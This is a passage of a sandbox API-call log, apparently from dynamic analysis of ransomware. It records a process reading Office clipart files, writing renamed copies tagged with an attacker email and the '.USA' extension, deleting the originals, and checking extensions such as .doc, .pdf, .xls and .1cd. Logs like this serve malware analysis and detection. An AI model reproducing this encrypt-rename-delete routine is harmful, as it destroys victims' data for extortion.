[0057.645] WriteFile (in: hFile=0x1c8, lpBuffer=0x32c0020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2bafc9c, lpOverlapped=0x0 | out: lpBuffer=0x32c0020*, lpNumberOfBytesWritten=0x2bafc9c*=0xec, lpOverlapped=0x0) returned 1 [0057.645] SetEndOfFile (hFile=0x1c8) returned 1 [0057.646] CloseHandle (hObject=0x1c8) returned 1 [0057.646] SetFilePointerEx (in: hFile=0x22c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2bafec8 | out: lpNewFilePointer=0x0) returned 1 [0057.646] SetEndOfFile (hFile=0x22c) returned 1 [0057.646] CloseHandle (hObject=0x22c) returned 1 [0057.647] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00098_.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA", dwFileAttributes=0x20) returned 1 [0057.647] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00098_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bl00098_.wmf")) returned 1 [0057.647] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00098_.WMF") returned 63 [0057.647] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00098_.WMF") returned 63 [0057.647] lstrlenW (lpString=".doc") returned 4 [0057.647] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0057.647] lstrlenW (lpString=".docx") returned 5 [0057.647] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0057.647] lstrlenW (lpString=".pdf") returned 4 [0057.647] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0057.647] lstrlenW (lpString=".xls") returned 4 [0057.647] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0057.647] lstrlenW (lpString=".xlsx") returned 5 [0057.647] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0057.647] lstrlenW (lpString=".ppt") returned 4 [0057.647] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0057.647] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00098_.WMF") returned 63 [0057.647] lstrlenW (lpString=".zip") returned 4 [0057.647] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0057.647] lstrlenW (lpString=".rar") returned 4 [0057.647] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0057.647] lstrlenW (lpString=".bz2") returned 4 [0057.647] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0057.647] lstrlenW (lpString=".7z") returned 3 [0057.648] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0057.648] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00098_.WMF") returned 63 [0057.648] lstrlenW (lpString=".dbf") returned 4 [0057.648] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0057.648] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00098_.WMF") returned 63 [0057.648] lstrlenW (lpString=".1cd") returned 4 [0057.648] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0057.648] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00098_.WMF") returned 63 [0057.648] lstrlenW (lpString=".jpg") returned 4 [0057.648] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0057.959] GetFileSizeEx (in: hFile=0x228, lpFileSize=0x2baff1c | out: lpFileSize=0x2baff1c*=880) returned 1 [0057.959] CloseHandle (hObject=0x228) returned 1 [0057.959] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00105_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bl00105_.wmf")) returned 0x20 [0057.959] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00105_.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bl00105_.wmf.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0057.960] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00105_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bl00105_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x228 [0057.960] SetFilePointerEx (in: hFile=0x228, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2bafec8 | out: lpNewFilePointer=0x0) returned 1 [0057.960] SetFilePointerEx (in: hFile=0x228, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2bafec8 | out: lpNewFilePointer=0x0) returned 1 [0057.960] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00105_.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bl00105_.wmf.id-9c354b42.[mr.hacker@tutanota.com].usa"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x230 [0057.960] GetLastError () returned 0x0 [0057.960] ReadFile (in: hFile=0x228, lpBuffer=0x32c0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2bafed4, lpOverlapped=0x0 | out: lpBuffer=0x32c0020*, lpNumberOfBytesRead=0x2bafed4*=0x370, lpOverlapped=0x0) returned 1 [0057.961] WriteFile (in: hFile=0x230, lpBuffer=0x32c0020*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2bafc9c, lpOverlapped=0x0 | out: lpBuffer=0x32c0020*, lpNumberOfBytesWritten=0x2bafc9c*=0x380, lpOverlapped=0x0) returned 1 [0057.962] ReadFile (in: hFile=0x228, lpBuffer=0x32c0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2bafed4, lpOverlapped=0x0 | out: lpBuffer=0x32c0020*, lpNumberOfBytesRead=0x2bafed4*=0x0, lpOverlapped=0x0) returned 1 [0057.962] WriteFile (in: hFile=0x230, lpBuffer=0x32c0020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2bafc9c, lpOverlapped=0x0 | out: lpBuffer=0x32c0020*, lpNumberOfBytesWritten=0x2bafc9c*=0xec, lpOverlapped=0x0) returned 1 [0057.962] SetEndOfFile (hFile=0x230) returned 1 [0057.962] CloseHandle (hObject=0x230) returned 1 [0057.963] SetFilePointerEx (in: hFile=0x228, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2bafec8 | out: lpNewFilePointer=0x0) returned 1 [0057.963] SetEndOfFile (hFile=0x228) returned 1 [0057.963] CloseHandle (hObject=0x228) returned 1 [0057.964] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00105_.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA", dwFileAttributes=0x20) returned 1 [0057.964] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00105_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bl00105_.wmf")) returned 1 [0057.964] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00105_.WMF") returned 63 [0057.964] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00105_.WMF") returned 63 [0057.964] lstrlenW (lpString=".doc") returned 4 [0057.964] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0057.964] lstrlenW (lpString=".docx") returned 5 [0057.964] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0057.964] lstrlenW (lpString=".pdf") returned 4 [0057.964] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0057.964] lstrlenW (lpString=".xls") returned 4 [0057.964] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0057.964] lstrlenW (lpString=".xlsx") returned 5 [0057.964] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0057.964] lstrlenW (lpString=".ppt") returned 4 [0057.964] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0057.964] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00105_.WMF") returned 63 [0057.964] lstrlenW (lpString=".zip") returned 4 [0057.964] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0057.964] lstrlenW (lpString=".rar") returned 4 [0057.964] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0057.964] lstrlenW (lpString=".bz2") returned 4 [0057.965] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0057.965] lstrlenW (lpString=".7z") returned 3 [0057.965] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0057.965] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00105_.WMF") returned 63 [0057.965] lstrlenW (lpString=".dbf") returned 4 [0057.965] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0057.965] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00105_.WMF") returned 63 [0057.965] lstrlenW (lpString=".1cd") returned 4 [0057.965] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0057.965] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00105_.WMF") returned 63 [0057.965] lstrlenW (lpString=".jpg") returned 4 [0057.965] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0057.965] GetFileSizeEx (in: hFile=0x228, lpFileSize=0x2baff1c | out: lpFileSize=0x2baff1c*=12482) returned 1 [0057.965] CloseHandle (hObject=0x228) returned 1 [0057.965] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00261_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bl00261_.wmf")) returned 0x20 [0057.965] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00261_.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bl00261_.wmf.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0057.965] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00261_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bl00261_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x228 [0057.965] SetFilePointerEx (in: hFile=0x228, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2bafec8 | out: lpNewFilePointer=0x0) returned 1 [0057.966] SetFilePointerEx (in: hFile=0x228, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2bafec8 | out: lpNewFilePointer=0x0) returned 1 [0057.966] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00261_.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bl00261_.wmf.id-9c354b42.[mr.hacker@tutanota.com].usa"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x230 [0057.966] GetLastError () returned 0x0 [0057.966] ReadFile (in: hFile=0x228, lpBuffer=0x32c0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2bafed4, lpOverlapped=0x0 | out: lpBuffer=0x32c0020*, lpNumberOfBytesRead=0x2bafed4*=0x30c2, lpOverlapped=0x0) returned 1 [0057.967] WriteFile (in: hFile=0x230, lpBuffer=0x32c0020*, nNumberOfBytesToWrite=0x30d0, lpNumberOfBytesWritten=0x2bafc9c, lpOverlapped=0x0 | out: lpBuffer=0x32c0020*, lpNumberOfBytesWritten=0x2bafc9c*=0x30d0, lpOverlapped=0x0) returned 1 [0057.968] ReadFile (in: hFile=0x228, lpBuffer=0x32c0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2bafed4, lpOverlapped=0x0 | out: lpBuffer=0x32c0020*, lpNumberOfBytesRead=0x2bafed4*=0x0, lpOverlapped=0x0) returned 1 [0057.969] WriteFile (in: hFile=0x230, lpBuffer=0x32c0020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2bafc9c, lpOverlapped=0x0 | out: lpBuffer=0x32c0020*, lpNumberOfBytesWritten=0x2bafc9c*=0xec, lpOverlapped=0x0) returned 1 [0057.969] SetEndOfFile (hFile=0x230) returned 1 [0057.969] CloseHandle (hObject=0x230) returned 1 [0057.969] SetFilePointerEx (in: hFile=0x228, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2bafec8 | out: lpNewFilePointer=0x0) returned 1 [0057.969] SetEndOfFile (hFile=0x228) returned 1 [0057.970] CloseHandle (hObject=0x228) returned 1 [0057.970] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00261_.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA", dwFileAttributes=0x20) returned 1 [0057.970] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00261_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bl00261_.wmf")) returned 1 [0057.970] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00261_.WMF") returned 63 [0057.970] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00261_.WMF") returned 63 [0057.970] lstrlenW (lpString=".doc") returned 4 [0057.970] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0057.970] lstrlenW (lpString=".docx") returned 5 [0057.970] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0057.970] lstrlenW (lpString=".pdf") returned 4 [0057.970] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0057.971] lstrlenW (lpString=".xls") returned 4 [0057.971] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0057.971] lstrlenW (lpString=".xlsx") returned 5 [0057.971] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0057.971] lstrlenW (lpString=".ppt") returned 4 [0057.971] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0057.971] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00261_.WMF") returned 63 [0057.971] lstrlenW (lpString=".zip") returned 4 [0057.971] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0057.971] lstrlenW (lpString=".rar") returned 4 [0057.971] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0057.971] lstrlenW (lpString=".bz2") returned 4 [0057.971] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0057.971] lstrlenW (lpString=".7z") returned 3 [0057.971] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0057.971] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00261_.WMF") returned 63 [0057.971] lstrlenW (lpString=".dbf") returned 4 [0057.971] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0057.971] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00261_.WMF") returned 63 [0057.971] lstrlenW (lpString=".1cd") returned 4 [0057.971] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0057.971] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00261_.WMF") returned 63 [0057.971] lstrlenW (lpString=".jpg") returned 4 [0057.971] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0057.972] GetFileSizeEx (in: hFile=0x228, lpFileSize=0x2baff1c | out: lpFileSize=0x2baff1c*=2556) returned 1 [0057.972] CloseHandle (hObject=0x228) returned 1 [0057.972] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00262_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bl00262_.wmf")) returned 0x20 [0057.972] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00262_.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bl00262_.wmf.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0057.972] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00262_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bl00262_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x228 [0057.972] SetFilePointerEx (in: hFile=0x228, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2bafec8 | out: lpNewFilePointer=0x0) returned 1 [0057.972] SetFilePointerEx (in: hFile=0x228, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2bafec8 | out: lpNewFilePointer=0x0) returned 1 [0057.972] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00262_.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bl00262_.wmf.id-9c354b42.[mr.hacker@tutanota.com].usa"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x230 [0057.973] GetLastError () returned 0x0 [0057.973] ReadFile (in: hFile=0x228, lpBuffer=0x32c0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2bafed4, lpOverlapped=0x0 | out: lpBuffer=0x32c0020*, lpNumberOfBytesRead=0x2bafed4*=0x9fc, lpOverlapped=0x0) returned 1 [0057.974] WriteFile (in: hFile=0x230, lpBuffer=0x32c0020*, nNumberOfBytesToWrite=0xa00, lpNumberOfBytesWritten=0x2bafc9c, lpOverlapped=0x0 | out: lpBuffer=0x32c0020*, lpNumberOfBytesWritten=0x2bafc9c*=0xa00, lpOverlapped=0x0) returned 1 [0057.975] ReadFile (in: hFile=0x228, lpBuffer=0x32c0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2bafed4, lpOverlapped=0x0 | out: lpBuffer=0x32c0020*, lpNumberOfBytesRead=0x2bafed4*=0x0, lpOverlapped=0x0) returned 1 [0057.975] WriteFile (in: hFile=0x230, lpBuffer=0x32c0020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2bafc9c, lpOverlapped=0x0 | out: lpBuffer=0x32c0020*, lpNumberOfBytesWritten=0x2bafc9c*=0xec, lpOverlapped=0x0) returned 1 [0057.975] SetEndOfFile (hFile=0x230) returned 1 [0057.975] CloseHandle (hObject=0x230) returned 1 [0057.975] SetFilePointerEx (in: hFile=0x228, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2bafec8 | out: lpNewFilePointer=0x0) returned 1 [0057.975] SetEndOfFile (hFile=0x228) returned 1 [0057.976] CloseHandle (hObject=0x228) returned 1 [0057.976] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00262_.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA", dwFileAttributes=0x20) returned 1 [0057.976] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00262_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bl00262_.wmf")) returned 1 [0057.976] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00262_.WMF") returned 63 [0057.976] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00262_.WMF") returned 63 [0057.976] lstrlenW (lpString=".doc") returned 4 [0057.976] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0057.977] lstrlenW (lpString=".docx") returned 5 [0057.977] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0057.977] lstrlenW (lpString=".pdf") returned 4 [0057.977] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0057.977] lstrlenW (lpString=".xls") returned 4 [0057.977] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0057.977] lstrlenW (lpString=".xlsx") returned 5 [0057.977] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0057.977] lstrlenW (lpString=".ppt") returned 4 [0057.977] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0057.977] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00262_.WMF") returned 63 [0057.977] lstrlenW (lpString=".zip") returned 4 [0057.977] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0057.977] lstrlenW (lpString=".rar") returned 4 [0057.977] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0057.977] lstrlenW (lpString=".bz2") returned 4 [0057.977] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0057.977] lstrlenW (lpString=".7z") returned 3 [0057.977] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0057.977] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00262_.WMF") returned 63 [0057.977] lstrlenW (lpString=".dbf") returned 4 [0057.977] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0057.977] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00262_.WMF") returned 63 [0057.977] lstrlenW (lpString=".1cd") returned 4 [0057.977] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0057.977] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00262_.WMF") returned 63 [0057.977] lstrlenW (lpString=".jpg") returned 4 [0057.977] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0057.978] GetFileSizeEx (in: hFile=0x228, lpFileSize=0x2baff1c | out: lpFileSize=0x2baff1c*=5752) returned 1 [0057.978] CloseHandle (hObject=0x228) returned 1 [0057.978] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00265_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bl00265_.wmf")) returned 0x20 [0057.978] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00265_.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bl00265_.wmf.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0057.978] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00265_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bl00265_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x228 [0057.978] SetFilePointerEx (in: hFile=0x228, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2bafec8 | out: lpNewFilePointer=0x0) returned 1 [0057.978] SetFilePointerEx (in: hFile=0x228, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2bafec8 | out: lpNewFilePointer=0x0) returned 1 [0057.978] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00265_.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bl00265_.wmf.id-9c354b42.[mr.hacker@tutanota.com].usa"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x230 [0057.978] GetLastError () returned 0x0 [0057.978] ReadFile (in: hFile=0x228, lpBuffer=0x32c0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2bafed4, lpOverlapped=0x0 | out: lpBuffer=0x32c0020*, lpNumberOfBytesRead=0x2bafed4*=0x1678, lpOverlapped=0x0) returned 1 [0058.193] WriteFile (in: hFile=0x230, lpBuffer=0x32c0020*, nNumberOfBytesToWrite=0x1680, lpNumberOfBytesWritten=0x2bafc9c, lpOverlapped=0x0 | out: lpBuffer=0x32c0020*, lpNumberOfBytesWritten=0x2bafc9c*=0x1680, lpOverlapped=0x0) returned 1 [0058.194] ReadFile (in: hFile=0x228, lpBuffer=0x32c0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2bafed4, lpOverlapped=0x0 | out: lpBuffer=0x32c0020*, lpNumberOfBytesRead=0x2bafed4*=0x0, lpOverlapped=0x0) returned 1 [0058.194] WriteFile (in: hFile=0x230, lpBuffer=0x32c0020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2bafc9c, lpOverlapped=0x0 | out: lpBuffer=0x32c0020*, lpNumberOfBytesWritten=0x2bafc9c*=0xec, lpOverlapped=0x0) returned 1 [0058.194] SetEndOfFile (hFile=0x230) returned 1 [0058.194] CloseHandle (hObject=0x230) returned 1 [0058.194] SetFilePointerEx (in: hFile=0x228, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2bafec8 | out: lpNewFilePointer=0x0) returned 1 [0058.194] SetEndOfFile (hFile=0x228) returned 1 [0058.195] CloseHandle (hObject=0x228) returned 1 [0058.195] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00265_.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA", dwFileAttributes=0x20) returned 1 [0058.195] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00265_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bl00265_.wmf")) returned 1 [0058.195] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00265_.WMF") returned 63 [0058.195] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00265_.WMF") returned 63 [0058.195] lstrlenW (lpString=".doc") returned 4 [0058.196] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0058.196] lstrlenW (lpString=".docx") returned 5 [0058.196] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0058.196] lstrlenW (lpString=".pdf") returned 4 [0058.196] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0058.196] lstrlenW (lpString=".xls") returned 4 [0058.196] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0058.196] lstrlenW (lpString=".xlsx") returned 5 [0058.196] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0058.196] lstrlenW (lpString=".ppt") returned 4 [0058.196] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0058.196] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00265_.WMF") returned 63 [0058.196] lstrlenW (lpString=".zip") returned 4 [0058.196] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0058.196] lstrlenW (lpString=".rar") returned 4 [0058.196] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0058.196] lstrlenW (lpString=".bz2") returned 4 [0058.196] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0058.196] lstrlenW (lpString=".7z") returned 3 [0058.196] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0058.196] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00265_.WMF") returned 63 [0058.196] lstrlenW (lpString=".dbf") returned 4 [0058.196] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0058.196] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00265_.WMF") returned 63 [0058.196] lstrlenW (lpString=".1cd") returned 4 [0058.196] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned 